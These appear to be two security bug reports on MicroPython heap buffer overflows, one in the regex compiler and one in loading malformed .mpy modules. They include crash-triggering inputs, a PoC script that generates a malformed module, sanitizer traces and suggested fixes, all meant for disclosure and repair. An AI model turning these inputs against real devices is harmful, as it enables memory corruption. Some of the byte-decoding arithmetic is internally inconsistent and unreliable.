heap buffer overflow found at micropython/lib/re1.5/compilecode.c:68 [micropython@a5bdd39127]
Hi all, I'm Wonil Jang, from the research group S2Lab in UNIST.
We found a heap buffer overflow bug in MicroPython using our custom tool. The detailed information is as follows.
Environment
- OS: Ubuntu 22.04
- Version: micropython at commit a5bdd39127
- Build: unix port
- Bug Type: heap-buffer-overflow
- Bug Location: micropython/lib/re1.5/compilecode.c:68
- Credits: Junwha Hong and Wonil Jang, from S2Lab in UNIST
Problem Statement
...
case '[': {
    int cnt;
    term = PC;
    re++;
    if (*re == '^') {
        EMIT(PC++, ClassNot);
        re++;
    } else {
        EMIT(PC++, Class);
    }
    PC++; // Skip # of pair byte
    prog->len++;
    for (cnt = 0; *re != ']'; re++, cnt++) { // <== [1]
        char c = *re;
        if (c == '\\') {
            ++re;
            c = *re;
            if (MATCH_NAMED_CLASS_CHAR(c)) {
                c = RE15_CLASS_NAMED_CLASS_INDICATOR;
                goto emit_char_pair;
            }
        }
        if (!c) return NULL;
        if (re[1] == '-' && re[2] != ']') { // <== [2]
            re += 2;
        }
    emit_char_pair:
        EMIT(PC++, c);
        EMIT(PC++, *re);
    }
    EMIT_CHECKED(term + 1, cnt);
    break;
}
...
The heap-buffer-overflow occurs at [1], because the loop never verifies that it is still inside the regex string.
For instance, given the regex string ([a-zA-Z_0- (followed by its terminating NUL), the loop eventually processes the final 0-(null).
At [2], re[1] is '-' and re[2] is the NUL terminator rather than ']', so re += 2 moves re onto the NUL.
Because there is no check on the length of the regex string, the loop's re++ then steps past the NUL, and the *re != ']' test at [1] reads the byte after 0-(null), which is an out-of-bounds read.
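The pointer movement described above can be traced with a small Python model of the loop. This is only a sketch: first_oob_read is a hypothetical helper, the regex is modelled as a byte string with one terminating NUL, escape handling is left out, and Python's IndexError stands in for the out-of-bounds read that ASan reports.

```python
from typing import Optional

NUL, DASH, CLOSE = 0, ord("-"), ord("]")


def first_oob_read(pattern: bytes) -> Optional[int]:
    """Model the '[' loop of _compilecode (escape handling omitted).

    Returns the first index read beyond the NUL terminator, or None if
    the loop stops inside the buffer.
    """
    buf = pattern + b"\x00"          # C strings carry one terminating NUL
    re = buf.index(b"[") + 1         # position just after '['
    last = None

    def peek(i: int) -> int:
        nonlocal last
        last = i
        return buf[i]                # raises IndexError past the end

    try:
        while peek(re) != CLOSE:     # [1] loop condition
            c = peek(re)
            if c == NUL:             # models `if (!c) return NULL;`
                return None
            if peek(re + 1) == DASH and peek(re + 2) != CLOSE:  # [2]
                re += 2              # may land exactly on the NUL
            re += 1                  # loop increment: may step past the NUL
    except IndexError:
        return last
    return None


pattern = b"([a-zA-Z_0-"
print(first_oob_read(pattern), len(pattern))
```

For the pattern from this report the model reports index 12, one past the NUL at index 11, while a well-formed class such as [a-z] never leaves the buffer.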
Example (replication)
>>> import re
>>> re.sub(r"([a-zA-Z_0-", "b", "1a2a3a")
=================================================================
#0 0x5555557b9461 in _compilecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:68:27
#1 0x5555557b97ed in _compilecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:103:18
#2 0x5555557b78da in re1_5_sizecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:194:9
#3 0x5555557b78da in mod_re_compile /home/qbit/testing-2023/micropython/ports/unix/../../extmod/modre.c:427:16
#4 0x5555557b6cd7 in re_sub_helper /home/qbit/testing-2023/micropython/ports/unix/../../extmod/modre.c:287:16
Patch
The simplest patch would be to add a check on the length of the regex string re, so that the loop stops as soon as it reaches the terminating NUL.
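One possible shape for such a check, modelled in Python rather than C, is sketched below. It is not the actual MicroPython patch: class_is_terminated is a hypothetical name, escape handling is omitted, and the only addition to the original loop is the test after re += 2.

```python
NUL, DASH, CLOSE = 0, ord("-"), ord("]")


def class_is_terminated(pattern: bytes) -> bool:
    """Return False (the C code would return NULL) for an unterminated class."""
    buf = pattern + b"\x00"          # regex string plus its terminating NUL
    re = buf.index(b"[") + 1
    while buf[re] != CLOSE:
        if buf[re] == NUL:           # existing check: `if (!c) return NULL;`
            return False
        if buf[re + 1] == DASH and buf[re + 2] != CLOSE:
            re += 2
            if buf[re] == NUL:       # added check: range has no upper bound
                return False
        re += 1
    return True
```

With the added test, re can never be incremented past the NUL, so every index used in the loop stays inside the buffer.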
Log
#0 0x5555557b9461 in _compilecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:68:27
#1 0x5555557b97ed in _compilecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:103:18
#2 0x5555557b78da in re1_5_sizecode /home/qbit/testing-2023/micropython/ports/unix/../../lib/re1.5/compilecode.c:194:9
#3 0x5555557b78da in mod_re_compile /home/qbit/testing-2023/micropython/ports/unix/../../extmod/modre.c:427:16
#4 0x5555557b6cd7 in re_sub_helper /home/qbit/testing-2023/micropython/ports/unix/../../extmod/modre.c:287:16
#5 0x555555782c1c in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:1042:21
#6 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42
#7 0x555555903f3d in execute_from_lexer /home/qbit/testing-2023/micropython/ports/unix/main.c:161:13
#8 0x555555902ad5 in do_file /home/qbit/testing-2023/micropython/ports/unix/main.c:310:12
#9 0x555555902ad5 in main_ /home/qbit/testing-2023/micropython/ports/unix/main.c:722:19
#10 0x7ffff7c29d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#11 0x7ffff7c29e3f in __libc_start_main csu/../csu/libc-start.c:392:3
#12 0x555555593a34 in _start (/home/qbit/testing-2023/micropython/ports/unix/build-standard/micropython+0x3fa34)
Thank you for reading my report.
heap-buffer-overflow (.mpy): from importing a malformed .mpy module
Because this bug is complicated, it may be easier to read this report in the attached PDF.
heap-buffer-overflow #1.pdf
Thank you for taking the time to review our bug report! :)
Summary
- OS: Ubuntu 22.04
- version: micropython@a00c9d56db775ee5fc14c2db60eb07bab8e872dd
- port: unix
- contribution: Junwha Hong and Wonil Jang @S2-Lab, UNIST
- description:
- Importing a malformed .mpy module leads to a buffer overflow in the bytecode executor
- A code chunk was allocated at persistentcode.c:249
- The chunk was accessed at vm.c:311 through the code pointer ip
- which was pre-determined at mp_setup_code_state_helper (bc.c:140)
PoC Generation
The PoC can be generated with the code below, bof_module_gen.py:
try:
    import sys, io, os
    sys.implementation._mpy
    io.IOBase
    os.mount
except (ImportError, AttributeError):
    print("Error")
    raise SystemExit
mpy_arch = sys.implementation._mpy >> 8
# these are the test .mpy files
valid_header = bytes([77, 6, mpy_arch, 31])
# fmt: off
user_files = {
    # bad architecture (mpy_arch needed for sub-version)
    '/mod1.mpy': valid_header + (
        b'\x02' # n_qstr
        b'\x00' # n_obj
        b'\x02' # 2 children
        b'\x42' # 8 bytes, no children, viper code
        b'\x00[x00' # dummy machine code
    ),
}
# fmt: on
with open("bof_module.mpy", "wb") as f:
    f.write(user_files['/mod1.mpy'])
micropython bof_module_gen.py
micropython -c "import bof_module"
Crash Log
#0 0x5555557855f4 in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c
#1 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42
#2 0x555555777269 in do_load /home/qbit/testing-2023/micropython/ports/unix/../../py/builtinimport.c
#3 0x555555776022 in process_import_at_level /home/qbit/testing-2023/micropython/ports/unix/../../py/builtinimport.c:512:9
#4 0x555555776022 in mp_builtin___import___default /home/qbit/testing-2023/micropython/ports/unix/../../py/builtinimport.c:607:35
#5 0x5555557276b0 in mp_import_name /home/qbit/testing-2023/micropython/ports/unix/../../py/runtime.c:1525:12
#6 0x555555782770 in mp_execute_bytecode /home/qbit/testing-2023/micropython/ports/unix/../../py/vm.c:1235:21
#7 0x55555574261b in fun_bc_call /home/qbit/testing-2023/micropython/ports/unix/../../py/objfun.c:273:42
#8 0x555555903f3d in execute_from_lexer /home/qbit/testing-2023/micropython/ports/unix/main.c:161:13
#9 0x555555902f5d in do_str /home/qbit/testing-2023/micropython/ports/unix/main.c:314:12
#10 0x555555902f5d in main_ /home/qbit/testing-2023/micropython/ports/unix/main.c:635:23
#11 0x7ffff7c29d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
#12 0x7ffff7c29e3f in __libc_start_main csu/../csu/libc-start.c:392:3
#13 0x555555593a34 in _start (/home/qbit/testing-2023/micropython/ports/unix/build-standard/micropython+0x3fa34)
Description of malformed module
First of all, we need to keep in mind how our malformed .mpy module is loaded into the MicroPython runtime.
hexdump -C bof_module.mpy
00000000 4d 06 0a 1f **02 00 02 42 00 5b 78 30 30** |M......B.[x00|
0000000d
architecture of .mpy file from docs
| size | field | value (hex) |
|---|---|---|
| byte | value 0x4d (ASCII ‘M’) | 4d |
| byte | .mpy major version number | 06 |
| byte | native arch and minor version number (was feature flags in older versions) | 0a |
| byte | number of bits in a small int | 1f |
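As a quick cross-check of the header table, the four header bytes from the hexdump can be split in Python. This is a minimal sketch: parse_mpy_header is a hypothetical helper, not a MicroPython API, and the arch/minor-version byte is deliberately left undivided.

```python
def parse_mpy_header(data: bytes) -> dict:
    """Split the 4-byte .mpy header into the fields listed in the table."""
    if len(data) < 4:
        raise ValueError("truncated .mpy header")
    magic, major, arch_minor, small_int_bits = data[:4]
    if magic != ord("M"):
        raise ValueError("bad magic byte")
    return {
        "magic": chr(magic),
        "major_version": major,
        "arch_and_minor": arch_minor,      # left undivided in this sketch
        "small_int_bits": small_int_bits,
    }


header = parse_mpy_header(bytes.fromhex("4d060a1f"))
print(header)
```

The result matches the values the PoC generator writes: 77 ('M'), 6, mpy_arch and 31.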
little endian
| size | field | value (hex) |
|---|---|---|
| vuint | number of qstrs | 02 |
| vuint | number of constant objects | 00 |
| … | qstr data | {len, data}: {02>>1=01, 42}, {00>>1=00} |
| … | encoded constant objects | - |
| size | field | value |
|---|---|---|
| vuint | type, size and whether there are sub-raw-code elements | 5b (type=?, size=15) |
| … | code (bytecode or machine code) | ? |
| vuint | number of sub-raw-code elements (only if non-zero) | ? |
| … | sub-raw-code elements | ? |
We can validate this with GDB at runtime, from py/persistentcode.c:405:
(gdb) x/40b reader->data
0x7ffff7a05320: 0x60 0x53 0xa0 0xf7 0xff 0x7f 0x00 0x00
0x7ffff7a05328: 0x0d 0x00 0x00 0x00 0x4d 0x06 0x0a 0x1f
0x7ffff7a05330: 0x02 0x00 0x02 0x42 0x00 0x5b 0x78 0x30
0x7ffff7a05338: 0x30 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x7ffff7a05340: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(the 0x00 bytes after the end of the file will be read as 0xff)
From the memory map, it is clear that only 3 bytes of valid code remain, but the loader tries to read 15 bytes. It therefore reads 0xFF, the EOF signal returned by mp_reader_vfs_readbyte, for the missing bytes.
STATIC mp_raw_code_t *load_raw_code(mp_reader_t *reader, mp_module_context_t *context) {
    // Load function kind and data length
    **size_t kind_len = read_uint(reader);**
    int kind = (kind_len & 3) + MP_CODE_BYTECODE;
    bool has_children = !!(kind_len & 4);
    size_t fun_data_len = kind_len >> 3;
    #if !MICROPY_EMIT_MACHINE_CODE
    if (kind != MP_CODE_BYTECODE) {
        mp_raise_ValueError(MP_ERROR_TEXT("incompatible .mpy file"));
    }
    #endif
    uint8_t *fun_data = NULL;
    #if MICROPY_EMIT_MACHINE_CODE
    size_t prelude_offset = 0;
    mp_uint_t native_scope_flags = 0;
    mp_uint_t native_n_pos_args = 0;
    mp_uint_t native_type_sig = 0;
    #endif
    if (kind == MP_CODE_BYTECODE) {
        // Allocate memory for the bytecode
        **fun_data = m_new(uint8_t, fun_data_len);
        // Load bytecode
        read_bytes(reader, fun_data, fun_data_len);**
        ...
However, the root cause is not here (although ignoring the file reader's EOF is also a problem), but in the code that actually parses this 15-byte fun_data.
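The EOF behaviour mentioned above can be modelled in a few lines of Python. This is a sketch under assumptions: ByteReader, read_bytes_unchecked and read_bytes_checked are hypothetical names, the 3-byte payload is made up, and 0xFF as the EOF byte is taken from this report.

```python
class ByteReader:
    """Toy reader that, like the one in this report, yields 0xFF at EOF."""

    EOF = 0xFF

    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0

    def readbyte(self) -> int:
        if self.pos >= len(self.data):
            return self.EOF          # no error is signalled to the caller
        b = self.data[self.pos]
        self.pos += 1
        return b


def read_bytes_unchecked(reader: ByteReader, n: int) -> bytes:
    # Mirrors the loader's behaviour: the declared length is trusted.
    return bytes(reader.readbyte() for _ in range(n))


def read_bytes_checked(reader: ByteReader, n: int) -> bytes:
    # Hypothetical stricter variant: refuse to read past the end of the file.
    if n > len(reader.data) - reader.pos:
        raise ValueError("declared length exceeds remaining file data")
    return read_bytes_unchecked(reader, n)


payload = bytes([0x11, 0x22, 0x33])   # made-up 3 bytes of remaining data
print(read_bytes_unchecked(ByteReader(payload), 15).hex())
```

The unchecked read silently pads the 15-byte chunk with 0xFF, whereas the checked variant rejects the file. As noted above, that alone would not address the parsing of fun_data itself.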
Problem Statement
How was the chunk rc→fun_data accessed with an out-of-bounds index?
STATIC void do_load(mp_module_context_t *module_obj, vstr_t *file) {
...
mp_raw_code_load_file(**file_qstr**, &cm); <- allocation
do_execute_raw_code(cm.context, cm.rc, **file_qstr**); <- bof
...
By setting a breakpoint at the allocation site of fun_data, we can obtain information about the fun_data chunk:
b persistentcode.c:249
run
fun_data: [0x7ffff7a053c0, 0x7ffff7a053cf)
fun_data_len: 15
Also, stepping further with the n command shows that fun_data is stored in the bytecode field of the function object.
mp_obj_t mp_make_function_from_raw_code(const mp_raw_code_t *rc, const mp_module_context_t *context, const mp_obj_t *def_args) {
DEBUG_OP_printf("make_function_from_raw_code %p\n", rc);
assert(rc != NULL);
// def_args must be MP_OBJ_NULL or a tuple
assert(def_args == NULL || def_args[0] == MP_OBJ_NULL || mp_obj_is_type(def_args[0], &mp_type_tuple));
// def_kw_args must be MP_OBJ_NULL or a dict
assert(def_args == NULL || def_args[1] == MP_OBJ_NULL || mp_obj_is_type(def_args[1], &mp_type_dict));
// make the function, depending on the raw code kind
mp_obj_t fun;
switch (rc->kind) {
...
default:
// rc->kind should always be set and BYTECODE is the only remaining case
assert(rc->kind == MP_CODE_BYTECODE);
**fun = mp_obj_new_fun_bc(def_args, rc->fun_data, context, rc->children);**
...
mp_obj_t mp_obj_new_fun_bc(const mp_obj_t *def_args, const byte *code, const mp_module_context_t *context, struct _mp_raw_code_t *const *child_table) {
...
mp_obj_fun_bc_t *o = mp_obj_malloc_var(mp_obj_fun_bc_t, mp_obj_t, n_extra_args, &mp_type_fun_bc);
o->bytecode = code;
...
return MP_OBJ_FROM_PTR(o);
}
(gdb) x/10g o
0x7ffff7a05300: 0x00005555556313a0 0x0000000000000000
0x7ffff7a05310: 0x0000000000000000 0x00007ffff7a053c0
0x7ffff7a05320: 0x00000000000000ba 0x0000000000001f12
0x7ffff7a05330: 0x0000000000000b12 0x0000000000001f1a
0x7ffff7a05340: 0x0000000000000000 0x0000000000000000
The loader then calls the generated module_fun (our target chunk is now in module_fun.bytecode):
mp_obj_t module_fun = mp_make_function_from_raw_code(rc, context, NULL);
mp_call_function_0(module_fun);
We observed that the ip field of code_state already points out of bounds immediately after INIT_CODESTATE.
STATIC mp_obj_t fun_bc_call(mp_obj_t self_in, size_t n_args, size_t n_kw, const mp_obj_t *args) {
    ...
    mp_obj_fun_bc_t *self = MP_OBJ_TO_PTR(self_in); // 0x7ffff7a05300
    size_t n_state, state_size; // 7, 56
    DECODE_CODESTATE_SIZE(self->bytecode, n_state, state_size);
    // allocate state for locals and stack
    mp_code_state_t *code_state = NULL;
    #if MICROPY_ENABLE_PYSTACK
    code_state = mp_pystack_alloc(offsetof(mp_code_state_t, state) + state_size);
    #else
    if (state_size > VM_MAX_STATE_ON_STACK) {
        code_state = m_new_obj_var_maybe(mp_code_state_t, state, byte, state_size);
        #if MICROPY_DEBUG_VM_STACK_OVERFLOW
        if (code_state != NULL) {
            memset(code_state->state, 0, state_size);
        }
        #endif
    }
    if (code_state == NULL) {
        code_state = alloca(offsetof(mp_code_state_t, state) + state_size);
        #if MICROPY_DEBUG_VM_STACK_OVERFLOW
        memset(code_state->state, 0, state_size);
        #endif
        state_size = 0; // indicate that we allocated using alloca
    }
    #endif
    **INIT_CODESTATE(code_state, self, n_state, n_args, n_kw, args);**
    // execute the byte code with the correct globals context
    mp_globals_set(self->context->module.globals);
    **mp_vm_return_kind_t vm_return_kind = mp_execute_bytecode(code_state, MP_OBJ_NULL); <- BOF Access**
    ...
}
Further investigation of INIT_CODESTATE
INIT_CODESTATE is a macro that calls the mp_setup_code_state function:
#define INIT_CODESTATE(code_state, _fun_bc, _n_state, n_args, n_kw, args) \
    code_state->fun_bc = _fun_bc; \
    code_state->n_state = _n_state; \
    mp_setup_code_state(code_state, n_args, n_kw, args); \
    code_state->old_globals = mp_globals_get();
We can observe that ip is set to bytecode (the chunk [0x7ffff7a053c0, 0x7ffff7a053cf)) in mp_setup_code_state. Up to this point, ip is still valid.
void mp_setup_code_state(mp_code_state_t *code_state, size_t n_args, size_t n_kw, const mp_obj_t *args) {
    code_state->ip = code_state->fun_bc->bytecode; // 0x7ffff7a053c0
    code_state->sp = &code_state->state[0] - 1;
    #if MICROPY_STACKLESS
    code_state->prev = NULL;
    #endif
    #if MICROPY_PY_SYS_SETTRACE
    code_state->prev_state = NULL;
    code_state->frame = NULL;
    #endif
    **mp_setup_code_state_helper(code_state, n_args, n_kw, args);**
}
b mp_setup_code_state
run
c
Inside mp_setup_code_state_helper, ip is updated by ip = code_state->ip + n_info;, and this is where the invalid address 0x7ffff7a053da is assigned.
⇒ This means that n_info is the root cause!
// On entry code_state should be allocated somewhere (stack/heap) and
// contain the following valid entries:
// - code_state->fun_bc should contain a pointer to the function object
// **- code_state->ip should contain a pointer to the beginning of the prelude**
// - code_state->sp should be: &code_state->state[0] - 1
// - code_state->n_state should be the number of objects in the local state
STATIC void mp_setup_code_state_helper(mp_code_state_t *code_state, size_t n_args, size_t n_kw, const mp_obj_t *args) {
// This function is pretty complicated. It's main aim is to be efficient in speed and RAM
// usage for the common case of positional only args.
// get the function object that we want to set up (could be bytecode or native code)
mp_obj_fun_bc_t *self = code_state->fun_bc;
// Get cached n_state (rather than decode it again)
size_t n_state = code_state->n_state;
// Decode prelude
size_t n_state_unused, n_exc_stack_unused, scope_flags, n_pos_args, n_kwonly_args, n_def_pos_args;
**MP_BC_PRELUDE_SIG_DECODE_INTO(code_state->ip, n_state_unused, n_exc_stack_unused, scope_flags, n_pos_args, n_kwonly_args, n_def_pos_args);
MP_BC_PRELUDE_SIZE_DECODE(code_state->ip);**
(void)n_state_unused;
(void)n_exc_stack_unused;
...
// jump over code info (source file, argument names and line-number mapping)
**const uint8_t *ip = code_state->ip + n_info;**
// bytecode prelude: initialise closed over variables
for (; n_cell; --n_cell) {
size_t local_num = *ip++;
code_state_state[n_state - 1 - local_num] =
mp_obj_new_cell(code_state_state[n_state - 1 - local_num]);
}
// now that we skipped over the prelude, set the ip for the VM
**code_state->ip = ip;**
DEBUG_printf("Calling: n_pos_args=%d, n_kwonly_args=%d\n", n_pos_args, n_kwonly_args);
dump_args(code_state_state + n_state - n_pos_args - n_kwonly_args, n_pos_args + n_kwonly_args);
dump_args(code_state_state, n_state);
}
n_info was decoded as a value larger than 15 (the allocated length of the code chunk) in MP_BC_PRELUDE_SIZE_DECODE.
#define MP_BC_PRELUDE_SIZE_DECODE(ip) \
    size_t n_info, n_cell; \
    MP_BC_PRELUDE_SIZE_DECODE_INTO(ip, n_info, n_cell); \
    (void)n_info; (void)n_cell
#define MP_BC_PRELUDE_SIZE_DECODE_INTO(ip, I, C) \
    do { \
        uint8_t z; \
        C = 0; \
        I = 0; \
        for (unsigned n = 0;; ++n) { \
            z = *(ip)++; \
            /* xIIIIIIC */ \
            C |= (z & 1) << n; \
            I |= ((z & 0x7e) >> 1) << (6 * n); \
            if (!(z & 0x80)) { \
                break; \
            } \
        } \
    } while (0)
From GDB, we observed that MP_BC_PRELUDE_SIG_DECODE_INTO advances ip to 0x7ffff7a053c1, and MP_BC_PRELUDE_SIZE_DECODE then reads n_info from there.
MP_BC_PRELUDE_SIG_DECODE_INTO read z as 2, (p printf("%d", ((char*)0x7ffff7a053c1)) ⇒ 2)
MP_BC_PRELUDE_SIZE_DECODE constructs n_info as follows:
at n == 0;
I |= ((z & 0x7e) >> 1) << (6 * n);
z & 0x7e = 0x30
0x30 >> 1 = 0x18
0x18 << (6*n) = 0x18
and, because bit 7 of z is clear, the loop exits here
**=> n_info = 0x18 = 24, which incorrectly rebases the code pointer ip later**
In addition, ip itself had already advanced by 2 bytes while decoding the prelude, so the code pointer ip ends up rebased to offset 2 + 24 = 26 from the start of the chunk (0x7ffff7a053c0 + 26 = 0x7ffff7a053da).
Thus, the root cause is that the length encoded in the prelude is never validated against the size of the chunk that code_state→ip points into before ip is rebased.
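The offset arithmetic can be reproduced with a direct Python port of MP_BC_PRELUDE_SIZE_DECODE_INTO. This is a sketch: prelude_size_decode is a hypothetical name, the chunk base and length are the values from this report, and the size byte 0x30 is an assumption chosen because it is the value that decodes to n_info = 24.

```python
def prelude_size_decode(buf: bytes, ip: int):
    """Python port of MP_BC_PRELUDE_SIZE_DECODE_INTO.

    Returns (n_info, n_cell, new_ip).
    """
    n_info = n_cell = 0
    n = 0
    while True:
        z = buf[ip]
        ip += 1
        # each byte is laid out as xIIIIIIC
        n_cell |= (z & 1) << n
        n_info |= ((z & 0x7E) >> 1) << (6 * n)
        if not (z & 0x80):           # high bit clear: last size byte
            break
        n += 1
    return n_info, n_cell, ip


CHUNK_BASE = 0x7FFFF7A053C0          # from the report
CHUNK_LEN = 15                       # from the report
SIZE_BYTE = 0x30                     # assumption: the byte that yields n_info = 24

# Byte 0 is a placeholder for the one-byte signature (not decoded here);
# the rest of the chunk is filled with the EOF value 0xFF.
chunk = bytes([0x00, SIZE_BYTE]) + b"\xff" * (CHUNK_LEN - 2)

n_info, n_cell, ip = prelude_size_decode(chunk, 1)   # ip = 1 after the signature
target = CHUNK_BASE + ip + n_info
print(n_info, ip + n_info, hex(target))
```

Under these assumptions the rebased pointer lands at offset 26 of a 15-byte chunk, which is the address 0x7ffff7a053da seen in GDB.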
To summarize,
- The chunk was allocated at 0x7ffff7a053c0 with 0xf bytes => [0x7ffff7a053c0, 0x7ffff7a053cf)
  - at persistentcode.c:249
- It was accessed out of bounds at 0x7ffff7a053da (code pointer ip)
  - at vm.c:311
  - which was determined at mp_setup_code_state_helper (bc.c:140)
Patch
To prevent this kind of malformed input from causing a buffer overflow, the length-related parsing should be moved into the loader, and the validation should be enforced while the file is being read.
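A load-time check along these lines could look like the following Python sketch. It is not a proposed MicroPython patch: validate_prelude is a hypothetical name, and the sketch assumes the signature bytes use the same high-bit continuation scheme as the size bytes.

```python
def validate_prelude(fun_data: bytes) -> int:
    """Return the offset of the first opcode, or raise ValueError.

    Every read is bounds-checked against the allocated chunk.
    """
    ip = 0

    def next_byte() -> int:
        nonlocal ip
        if ip >= len(fun_data):
            raise ValueError("prelude runs past the end of the code chunk")
        z = fun_data[ip]
        ip += 1
        return z

    # Skip the signature (assumption: high bit set means another byte follows).
    while next_byte() & 0x80:
        pass

    # Decode n_info / n_cell exactly as MP_BC_PRELUDE_SIZE_DECODE_INTO does.
    n_info = n_cell = 0
    n = 0
    while True:
        z = next_byte()
        n_cell |= (z & 1) << n
        n_info |= ((z & 0x7E) >> 1) << (6 * n)
        if not (z & 0x80):
            break
        n += 1

    # The VM starts executing after the code info and the cell bytes.
    start = ip + n_info + n_cell
    if start >= len(fun_data):
        raise ValueError("bytecode start lies outside the code chunk")
    return start
```

Rejecting the module at this point means the interpreter never derives an instruction pointer from unvalidated lengths.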
Discussion
We believe this kind of input is already exercised by the tests in tests/micropython/import_mpy*.py, but that coverage does not seem to be sufficient.
This bug may not look critical, because importing the module produces “NotImplementedError: opcode”. However, it is in fact very critical: the out-of-bounds access occurs before the NotImplementedError is raised, so the buffer overflow can still affect the runtime if a user has code like:
try:
    import module_A # module_A is malformed by attacker
except:
    import module_A_alternative
...
# Normal routine
Thank you for taking the time to review our bug report! :)